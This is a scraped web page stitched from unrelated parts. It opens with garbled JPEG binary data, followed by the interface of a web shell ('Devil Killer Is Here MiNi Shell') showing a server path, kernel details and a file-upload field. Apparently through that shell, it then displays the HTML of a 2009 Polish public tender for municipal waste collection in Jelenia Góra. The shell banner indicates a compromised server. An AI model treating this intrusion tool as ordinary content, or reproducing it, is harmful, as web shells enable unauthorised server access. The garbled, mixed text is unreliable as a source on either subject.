JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/34452-N-2009.html

<p class="kh_header"><b>Jelenia Góra: Wywóz odpadów komunalnych z nieruchomości  komunalnych administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze.</b><br>
<b>Numer ogłoszenia: 34452 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej "Południe" w Jeleniej Górze , Plac Piastowski 2A, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 6428200, faks 075 6428201.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów komunalnych z nieruchomości  komunalnych administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest świadczenie usług w zakresie wywozu odpadów        komunalnych z nieruchomości  komunalnych administrowanych przez Zakład Gospodarki Lokalowej  Południe  w Jeleniej Górze do miejsc ich unieszkodliwiania lub odzysku zgodnie z regulaminem utrzymania czystości i porządku na terenie m. Jelenia Góra (Uchwała Nr 129/XIX/2007 Rady Miejskiej m. Jelenia Góra z dnia 27.11.2007 r.)
CPV 90512000-9 - usługi transportu odpadów,
CPV 90513100-7 - usługi wywozu opadów pochodzących z gospodarstw domowych,
CPV 90513200-0 - usługi wywozu stałych odpadów miejskich.
Przez odpady komunalne należy rozumieć odpady powstające w  gospodarstwach domowych, a także odpady nie zawierające odpadów niebezpiecznych pochodzące od innych wytwórców odpadów, które ze względu na charakter lub skład są podobne do odpadów powstających w gospodarstwach domowych. 
Przez odpady komunalne wielkogabarytowe należy rozumieć odpady komunalne, które ze względu na swoje rozmiary i masę nie mogą być zbierane w typowych pojemnikach na odpady (np. meble, sprzęt AGD, wózki dziecięce itp.). 

Przedmiot zamówienia obejmuje wywóz odpadów pochodzących z nieruchomości administrowanych przez Zamawiającego, tj.:
-	odpadów komunalnych, 
-	odpadów komunalnych wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego,
-	odpadów wrzucanych przez podmioty sprzątające Zamawiającego do pojemników na odpady, a pochodzące z usuwania zanieczyszczeń z obudów i miejsc do gromadzenia nieczystości i ich zamiatania oraz z opróżniania koszy ulicznych stanowiących własność Zamawiającego,
-	odpadów z selektywnej zbiórki odpadów typu plasit, szkło bezbarwne, szkło kolorowe, papier,
-	wywóz odpadów gromadzonych w obrębie 2 metrów od pojemników.
Nieruchomości administrowane przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze położone są w granicach administracyjnych miasta Jelenia Góra na obszarze obejmującym ok. 10 km2. Większość administrowanych nieruchomości to budynki mieszkalne z początku XX wieku, wielorodzinne, maksymalnie 4 kondygnacyjne. W budynkach brak jest zsypów na śmieci. Odpady stałe winny być gromadzone w urządzeniach do gromadzenia odpadów ( szczelnych, zamkniętych pojemnikach ) usytuowanych obok budynków w wyznaczonych w tym celu miejscach. Obok pojemników składowane są przez mieszkańców przedmioty wielkogabarytowe takie jak stare meble, opakowania, sprzęt AGD, a wiosną i jesienią odpady organiczne - głównie liście i gałęzie. Stwierdzono bardzo częste przypadki wysypywania z pojemników odpadów przez osoby zajmujące się poszukiwaniem surowców wtórnych.
     Wymaga się opróżniania pojemników minimum jeden raz w tygodniu.
     W administrowanych nieruchomościach komunalnych wg stanu na 31.12.2008 r. 
     zamieszkuje 4.497 osób.

     Zamawiający informuje ponadto że zarządza nieruchomościami Wspólnot     Mieszkaniowych w których wg stanu na 31.12.2008 r. zamieszkuje 9.912 osób.     Zamawiający zaprosi Wykonawcę którego oferta zostanie wybrana w powyższym     postępowaniu do rokowań i zawarcia umowy na świadczenie powyższych usług na rzecz     Wspólnot Mieszkaniowych na warunkach tożsamych lub korzystniejszych jak dla     budynków komunalnych.
     
     Usługi obejmują następujący zakres czynności:
1.	dostarczenie oraz ustawienie pojemników o pojemności od 110 do 1100 litrów, w terminie
     uzgodnionym z Zamawiającym w punktach gromadzenia nieczystości określonych w
     załącznikach nr 6A, 6B, we własnym zakresie i  na własny koszt standardowych, 
     ujednoliconych, oznakowanych nazwą  Wykonawcy urządzeń do gromadzenia  odpadów,
     ustawienie  ich   w   miejscach   wg  Planu  rozmieszczenia pojemników łącznie z 
     harmonogramem ich mycia i  dezynfekcji, który wybrany Wykonawca opracuje w
     terminie 7 dni po podpisaniu umowy. 
2.	wszystkie pojemniki muszą spełniać następujące wymogi techniczne i estetyczne:
a)	mają mieć schludny i estetyczny wygląd,
b)	mają być odporne na uszkodzenia mechaniczne, zmienne warunki atmosferyczne i wachania temperatur, a po opróżnieniu mają być ustawione w sposób gwarantujący ich stabilność,
c)	musza być czyste na zewnątrz,
d)	muszą być bezwzględnie wyposażone w zamknięcia, klapy, pokrywy, a urządzenia te powinny być zawsze sprawne,
3.	ustawienie 24 zestawów pojemników, przeznaczonych do selektywnej zbiórki odpadów 
     typu plasit, szkło bezbarwne, szkło kolorowe, papier oraz transport tych odpadów do miejsc ich
     odzysku. Lokalizację przedstawia załącznik nr 6 C do SIWZ.
4.	dbanie o należyty stan techniczny ustawionych urządzeń do gromadzenia odpadów;
     wykonywanie napraw uszkodzonych urządzeń do gromadzenia odpadów w ciągu 3 dni
     od stwierdzenia lub od zgłoszenia faxem przez upoważnionego pracownika
    Zamawiającego uszkodzenia, spalenia lub kradzieży a w przypadku niemożności 
    usunięcia uszkodzeń, wymiany uszkodzonych lub nie nadających  się  do naprawy
    urządzeń na nowe, Zamawiający nie będzie ponosił kosztów z tego tytułu,
5.	usuwanie z ustawionych urządzeń do gromadzenia odpadów, odpadów komunalnych
    z częstotliwością co najmniej l raz na tydzień w dzień powszedni w godzinach nie
   zakłócających ciszy nocnej. W przypadku, gdy w przewidzianym do tego dniu odpady
    nie zostaną usunięte z przyczyn powodowanych warunkami atmosferycznymi lub faktem,
    że dzień ten będzie dniem ustawowo wolnym od pracy , odpady winny być usunięte  
    niezwłocznie w następnym dniu roboczym. Wykonawca zobowiązany jest do posprzątania
    stanowiska śmietnikowego bez dodatkowej opłaty. Wykonawca każdorazowo zobowiązany będzie
     do usuwania zanieczyszczeń powstałych w wyniku załadunku.
6.	mycie i dezynfekcja pojemników do gromadzenia odpadów w okresie od l kwietnia do 
    30 października nie rzadziej niż raz na miesiąc w miejscu ich ustawienia w sposób nie
    pozostawiający zanieczyszczeń pojazdem specjalistycznym z zamkniętym obiegiem
    wody ze środkiem dezynfekującym,
7.	sukcesywne usuwanie przedmiotów   wielkogabarytowych - zakłada się iż średnio
     miesięcznie jest ich 5 ton,
8.	utrzymywanie w należytym stanie higienicznym pojemników oraz ich otoczenia
    w obrębie obudowy a w przypadku jej braku w promieniu 2 metrów od pojemników ,
9.	wywóz odpadów na wysypisko,
10.	dostarczanie wiosną i jesienią worków na liście i odpady organiczne oraz usuwanie
      zapełnionych worków,
11. wiosną i jesienią zamawiający wymaga wywiezienia   liści i odpadów organicznych
     gromadzonych w miejscu opisanym w pkt. 8 w miejsce przeznaczone do kompostowania
     lub spalenia,
12. nie dopuszczanie do przepełnienia urządzeń do gromadzenia odpadów,
13. zwiększenie częstotliwości wywozu w przypadku stwierdzenia przepełnienia urządzeń do
      gromadzenia odpadów,
14. jeżeli podczas realizacji zamówienia zajdzie konieczność usunięcia odpadów, na które
      wykonawca nie posiada zezwolenia ( np. odpadów niebezpiecznych, zwłok zwierząt), to ma
      obowiązek zlecić na własny koszt usunięcia tych odpadów podwykonawcy, posiadającemu
      stosowne uprawnienia w tym zakresie.
15. usługę w zakresie rozstawienia pojemników uważać się będzie za niewykonaną w przypadku
      stwierdzenia braku choćby jednego pojemnika  w stosunku do ilości zamówionej, lub takie ich 
      ustawienie, które nie zapewni stabilności pojemników,
16. usługę będącą przedmiotem niniejszego postępowania uważać się będzie za niewykonaną lub
      nienależycie wykonaną, jeżeli pojemniki nie będą spełniać wymogów pod względem 
      sanitarno-higienicznym, tzn. jeżeli stwierdzi się:
a)	przepełnienie pojemników odpadami, zabrudzenie na zewnątrz, nie wykonanie dezynfekcji w ustalonym terminie,
b)	trwałe uszkodzenie pojemników uniemożliwiające korzystanie z nich, tj. niesprawne zamknięcia klapy, pokrywy (zepsute zawiasy lub ich brak), uszkodzenia ścian pojemników.

Opróżnione pojemniki winny być odstawione na miejsce. W przypadku wysypania się odpadów/śmieci w miejscu ich załadunku do samochodu, zabrudzony teren winien zostać oczyszczony. 

Załącznikami do opisu przedmiotu zamówienia są Załączniki nr 6A,6B,6C, obejmujące:
- Wykaz budynków komunalnych ROM-1 - załącznik Nr 6 A,
- Wykaz budynków komunalnych ROM-2 - załącznik Nr 6 B,
- Wykaz budynków przy których należy postawić pojemniki do selektywnego zbierania odpadów 
   komunalnych. - załącznik Nr 6 C.
Zamawiający wymaga wyliczenia ceny wywozu odpadów wytwarzanych przez l mieszkańca jak również podanie ceny jednostkowej 1 m3 za wywóz odpadów pochodzących z lokali użytkowych. 
Na terenie administrowanym zamieszkuje 4.497 osób, cena za cały przedmiot zamówienia winna być obliczona w oparciu o opis przedmiotu zamówienia oraz dane z Załączników nr 6A,6B,6C.
Podane ilości i pojemności pojemników wynikają z dotychczasowych potrzeb. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia tej ilości o ok. 10%. 
Zmiany ilości osób z lokali mieszkalnych i powierzchni lokali użytkowych następować mogą w przedziałach kwartalnych poprzez aktualizację Załączników 6A i 6B do umowy (Zamawiający zastrzega sobie prawo ich dokonywania).
Bez względu na jakiekolwiek ograniczenia wynikające z opisu przedmiotu zamówienia (z uwzględnieniem załączników) Wykonawca winien mieć świadomość, że kwota podana przez niego w Formularzu oferty stanowi zapłatę za usługę wykonaną i zakończoną pod każdym względem. 
Uważa się, że Wykonawca wziął pod uwagę wszystkie wymagania i zobowiązania zawarte w specyfikacji istotnych warunków zamówienia. W wynagrodzenie wykonawcy muszą być wkalkulowane wszelkie wydatki niezbędne do realizacji przedmiotu umowy (np. nagłe i nieprzewidziane wydatki, podwyżki opłat itp.)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.20.00-9, 90.51.31.00-7, 90.51.32.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ofertę należy zabezpieczyć wniesieniem wadium w wysokości 10.000,00 zł, które należy wnieść przed terminem składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na podstawie
       art. 22 ust. l ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz. U. z
       2007 r., Nr 223, poz. 1655), tj.:
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ;
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
-	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. l i 2 ustawy Pzp.,
      oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
  2. Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. l pkt. l-4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych ,
-	wzór druku oświadczenia stanowi załącznik nr 2 do niniejszej specyfikacji,
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)
 3. Sposób dokonania oceny spełniania warunków wymaganych od Wykonawcy.
1)	Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy oraz prawidłowości treści oferty na podstawie oświadczeń i dokumentów o których mowa w punkcie 9 SIWZ na zasadzie spełnia - nie spełnia.
2)	Nie spełnienie przez Wykonawcę warunków wymaganych skutkować będzie  odpowiednio:
a)	wykluczeniem Wykonawcy z postępowania zgodnie z postanowieniami art. 24 ust. l i 2 pzp za nie spełnianie warunków udziału w postępowaniu,
b)	odrzuceniem oferty zgodnie z postanowieniami art. 89 pzp jeżeli oferta: 
    jest niezgodna z ustawą; jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art. 87 ust.2 pkt 3; jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia; zawiera błędy w obliczeniu ceny; wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki , o której mowa w art.87 ust.2 pkt 3.
4. Wykonawca powinien zadbać, aby treść oświadczeń i dokumentów składanych wraz z  ofertą
    jednoznacznie potwierdzała spełnianie każdego z warunków wymaganych przepisami pzp oraz
    postanowieniami treści siwz. Informacje składane w ofercie powinny przedstawiać stan prawny i 
    faktyczny na dzień składania oferty. Wykonawca odpowiada za prawdziwość danych i informacji
    zawartych w oświadczeniach i dokumentach składanych w ofercie oraz kompletność oferty.
5. Zgodnie z art. 92 ust. l pkt 2 i pkt 3 Zamawiający niezwłocznie po wyborze najkorzystniejszej
   oferty zawiadomi Wykonawców którzy złożyli oferty o Wykonawcach, których oferty zostały
   odrzucone, oraz o Wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie
    zamówienia, podając uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć następujące oświadczenia i dokumenty stanowiące ofertę :

1)	Ofertę na formularzu ofertowym, o treści zgodnej z załączonym wzorem formularza, szczegółowo wypełnioną i podpisaną.

2)	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych, wzór: Załącznik nr 2 do SIWZ

3)	Dokument potwierdzający wpłacenie/wniesienie wadium.
    W przypadku wnoszenia wadium w formie poręczeń, gwarancji bankowej, gwarancji 
    ubezpieczeniowej - należy do oferty załączyć kopię dokumentu .

4)	 Aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony nie wcześniej
niż 6 miesięcy przed upływem terminu składania ofert.

5)	Aktualne zezwolenie na odbieranie opadów komunalnych, wydane na podstawie Ustawy z dnia 13.09.1996 r. (Dz. U . Nr 132,poz 622) o utrzymaniu w czystości i porządku w gminach - (tekst jednolity Dz U. z 2005 r. Nr 236, póz. 2088 z późn. zm.).

6)	Aktualną koncesję, zezwolenie lub licencję w zakresie objętym zamówieniem publicznym - zezwolenia wydane na podstawie Ustawy z dnia 27.04.2001 r. o odpadach (Dz.U. Nr 62, póz. 628 z późn. zm.) - tekst jednolity ( Dz. U. z 2007 r. Nr 39, póz. 251, z późn. zm.).

7)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego
potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat
oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej
niż 3 miesiące przed upływem terminu składania ofert.

8)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24.ust.l.
pkt. 4 - 8 ustawy- Pzp - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert.

9)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym
w art. 24. ust. 1.pkt. 9 ustawy- Pzp. ,wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

- W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia przedmiotowe dokumenty wymienione w punkcie od 4) do 9) muszą być złożone dla każdego z nich.

10)	Doświadczenie zawodowe  - wykaz wykonanych, a w przypadku świadczeń okresowych lub
     ciągłych  również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania
      o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie odpowiadających swoim 
       rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, 
      przedmiotu, dat wykonania i odbiorców -   należy wykazać:
     co najmniej jedną usługę wykonaną w sposób ciągły przez okres co najmniej 1 roku,
     dotyczącą wywozu odpadów komunalnych o wartości nie mniejszej niż 200 000,00 zł
     brutto w skali roku . - wzór: Załącznik nr 3 do SIWZ. 

11)	Opinie  dotyczące jakości  wykonanych i  odebranych usług  -  wymienionych
w Załączniku nr 3 do SIWZ, wystawione przez zamawiających te usługi.

12)	Potencjał techniczny - wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca - wzór: Załącznik nr 4 do SIWZ. Wymagane jest dysponowanie przez Wykonawcę sprzętem i urządzeniami technicznymi niezbędnymi do wykonania zamówienia w tym:

-	pojemnikami na odpady o pojemności od 110 do 1100 litrów, 
-	minimum 2 bezpylnymi pojazdami wyposażonymi w umocowania do opróżniania
   pojemników o wymienionej pojemności 
-	hydrauliczną prasę lub inne urządzenie do zagęszczania odpadów, 
-	pojazd specjalistyczny  z zamkniętym obiegiem wody do mycia i dezynfekcji pojemników.

13) Aktualną polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że
  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności - o wartości ubezpieczenia nie mniejszej niż 100 000,00 zł. Kwotę ubezpieczenia wyrażoną w innej walucie niż PLN ,Zamawiający przeliczy na PLN, przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.
-	 W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.

Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

Nie spełnienie któregokolwiek ze wskazanych warunków udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O ZAMÓWIENIE:
1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni
spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające
spełnianie tych   warunków, zgodnie z zapisami zawartymi w pkt. 9. niniejszej
specyfikacji. Ponadto tacy Wykonawcy winni spełnić warunek określony w art. 23 ust. 2
Ustawy ustanawiając i wskazując Pełnomocnika do reprezentowania ich w niniejszym
postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców
ubiegających się o udzielenie zamówienia.
2.	Pełnomocnictwo, o którym mowa w pkt.l, musi się znajdować w ofercie wspólnej
wykonawców.
3.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania ; zwraca się
do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje,
korespondencję itp.
4.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia , których oferta została
wybrana, powinni przed zawarciem umowy w sprawie zamówienia publicznego przedłożyć
Zamawiającemu umowę regulującą ich współpracę (umowę konsorcjum).
5.	Oferta wspólna, składana przez dwóch lub więcej wykonawców powinna spełniać
następujące wymagania:
a)	oferta wspólna powinna być sporządzona zgodnie z SIWZ,
b) dokumenty wspólne: oferta cenowa, wykaz wykonanych usług, wykaz niezbędnych
do wykonania zamówienia narzędzi i urządzeń którymi dysponuje lub będzie
dysponował wykonawca, oświadczenie o spełnieniu warunków udziału w postępowaniu
stosownie do treści art. 44 w związku z art. 22 ust. l pkt. l-4 Ustawy, oświadczenie
         o zapoznaniu się z treścią projektu umowy, wadium oraz polisę składa Pełnomocnik 
        wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną,
6.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie, uznana
za najkorzystniejszą niezwłocznie przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu umowę konsorcjum, zawierającą w swojej treści m.in. następujące postanowienia:
a)	wyznaczenie spośród siebie podmiot (lidera ) upoważnionego do zaciągania
zobowiązań w imieniu wszystkich Wykonawców realizujących Umowę, wystawiania faktur, przyjmowania płatności i przyjmowania poleceń na rzecz i w imieniu wszystkich Wykonawców realizujących wspólnie Umowę,
b) określenie szczegółowo sposobu współdziałania przy wykonywaniu usług,
a)	zadeklarowanie solidarnej odpowiedzialności za realizację przedmiotu zamówienia
b)	określenie terminu obowiązywania umowy, który nie może być krótszy niż okres
obejmujący realizację zamówienia.
7.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgl.jga.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra.</p>
